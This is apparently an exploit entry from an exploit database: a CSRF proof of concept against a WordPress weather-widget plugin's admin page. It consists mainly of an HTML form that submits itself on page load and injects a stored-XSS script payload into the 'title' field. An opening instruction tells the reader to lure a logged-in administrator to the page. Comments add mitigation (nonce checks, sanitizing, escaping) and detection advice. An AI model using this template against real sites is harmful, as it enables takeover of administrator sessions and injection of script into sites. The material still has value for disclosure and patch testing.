## https://sploitus.com/exploit?id=WPEX-ID:0E677DF9-2C49-42F0-A8E2-DBCF85BFC1A2
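Make a logged-in admin open a page containing the code below. The page auto-submits a cross-site POST to the plugin's admin page, with a script payload in the `title` field.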

<!--
  Proof of concept for a cross-site request forgery (CSRF) against a WordPress
  plugin's admin page. example.com stands in for the site under test.

  What the markup does: when this page loads, the onload handler submits the
  first form as a cross-site POST to wp-admin/admin.php. If the visitor is an
  authenticated administrator, the browser attaches the admin session cookies,
  unless its SameSite handling withholds them on a cross-site POST. That is a
  browser-side mitigation and not a substitute for a server-side check.

  The form carries no nonce field, so the request presumably succeeds only
  because the plugin's save handler does not verify one (TODO confirm against
  the plugin source).

  Mitigation on the plugin side: emit a nonce with wp_nonce_field() in the
  settings form, verify it with check_admin_referer() or wp_verify_nonce()
  together with a current_user_can() check before saving, sanitize "title" on
  input (for example sanitize_text_field()) and escape it on output (for
  example esc_html()).

  Detection: POST requests to this admin page whose Origin or Referer header is
  not the site's own origin.
-->
<html>
  <body onload="document.forms[0].submit()">
    <!-- The query string selects the plugin's admin page with action=new; the body repeats "page" as a POST field. -->
    <form action="https://example.com/wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php&action=new" method="POST">
      <input type="hidden" name="page" value="tiempocom&#47;app&#47;admin&#46;php" />
      <!-- The browser decodes the entities before submitting, so "title" is sent as a script element
           that calls alert(/XSS/). Presumably the value is saved and later rendered without escaping,
           which would make this stored XSS; confirm where the plugin outputs the title. -->
      <input type="hidden" name="title" value="&lt;script&gt;alert&#40;/XSS/&#41;&lt;&#47;script&gt;" />
      <!-- The remaining fields appear to be ordinary widget settings (location, units, colours)
           included so that the request resembles a normal save. -->
      <input type="hidden" name="language" value="en" />
      <input type="hidden" name="continent" value="8" />
      <input type="hidden" name="country" value="208" />
      <input type="hidden" name="location" value="12325" />
      <input type="hidden" name="location&#95;label" value="Base&#32;Amundsen&#45;Scott&#32;del&#32;Polo&#32;Sur" />
      <input type="hidden" name="location&#95;link" value="https&#58;&#47;&#47;www&#46;tiempo&#46;com&#47;base&#45;amundsen&#45;scott&#45;del&#45;polo&#45;sur&#46;htm" />
      <input type="hidden" name="province&#95;type" value="4" />
      <input type="hidden" name="time" value="5" />
      <input type="hidden" name="format" value="1" />
      <input type="hidden" name="temperature&#95;format" value="0" />
      <input type="hidden" name="wind&#95;format" value="0" />
      <input type="hidden" name="rain&#95;format" value="0" />
      <input type="hidden" name="style" value="1" />
      <input type="hidden" name="marquee" value="&#35;000000" />
      <input type="hidden" name="background" value="&#35;FFFFFF" />
      <input type="hidden" name="text" value="&#35;808080" />
      <input type="hidden" name="max" value="&#35;FF0000" />
      <input type="hidden" name="min" value="&#35;0000FF" />
      <input type="hidden" name="font" value="1" />
      <input type="hidden" name="save" value="Save" />
      <input type="hidden" name="action" value="&#45;1" />
      <input type="hidden" name="paged" value="1" />
      <input type="hidden" name="action2" value="&#45;1" />
      <!-- Manual fallback only; the onload handler on body already submits the form. -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>